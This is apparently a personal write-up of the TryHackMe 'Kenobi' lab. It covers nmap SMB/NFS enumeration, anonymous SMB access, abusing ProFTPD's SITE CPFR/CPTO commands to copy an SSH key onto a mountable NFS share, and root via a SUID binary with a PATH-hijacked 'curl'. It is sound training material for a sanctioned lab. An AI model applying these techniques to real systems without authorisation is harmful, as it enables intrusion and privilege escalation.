# [[Kenobi]] --- ## Port Scanning and Enumeration (Nmap, SMB, FTP) --- ``` nmap -sV -oN nmap/init -sC -vv $IP ```  . ``` nmap -p 445 --script=smb-enum-shares.nse,smb-enum-user.nse #IP -oN nmap/smb ```  using `smbclient` ``` smbclient //10.10.181.253/anonymous ```  the `log.txt` file shows an ssh key pair being created and the basic `ProFTPD` configuration file Using nmap again to enumrate that port 111, we notice a mounted share `nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.253`  connecting to the FTP server on port 21 `nc 10.10.181.253 21`  ## Foothold (Metasploit, Mount) --- searchsploit for exploits   SITE CPFR = copy from, SITE COPYTO = copy to. This allows us to move files around on the system. In the log file it said that there was a ssh keypair created and gave it's location. Let's copy that key to a location in the `/var` directory since we have access to that mount  `mkdir /mnt/kenobiNFS` `mount 10.10.181.253:/var /mnt/kenobiNFS`  We now have access to the `tmp` folder where we copied the key to. we can now log in as kenobi  ## Privilege Escalation (SUID) --- Now that we have access we want to get root. Let's do a search for SUID binaries  `find / -perm -u=s -type f 2>/dev/null`  The odd one out is `/usr/bin/menu`  let's use `strings` on it and see what it has the interesting part is:  Since it's not calling `curl` using the full path, maybe we can hijack it  by creating our own `'curl'` and adding it to the `PATH` we can use the `/usr/bin/menu` binary to call *our* `curl`. Since the `/usr/bin/menu` binary is running with elevated privs, we are able to get root Switching the `PATH` back to the default `source /etc/environment` we can now cat the root flag --- Back to [[TryHackMe Index|TryHackMe Index]] Tags: #thm #tryhackme #box_writeups #smbclient #smb #nfs #ssh #suid Related: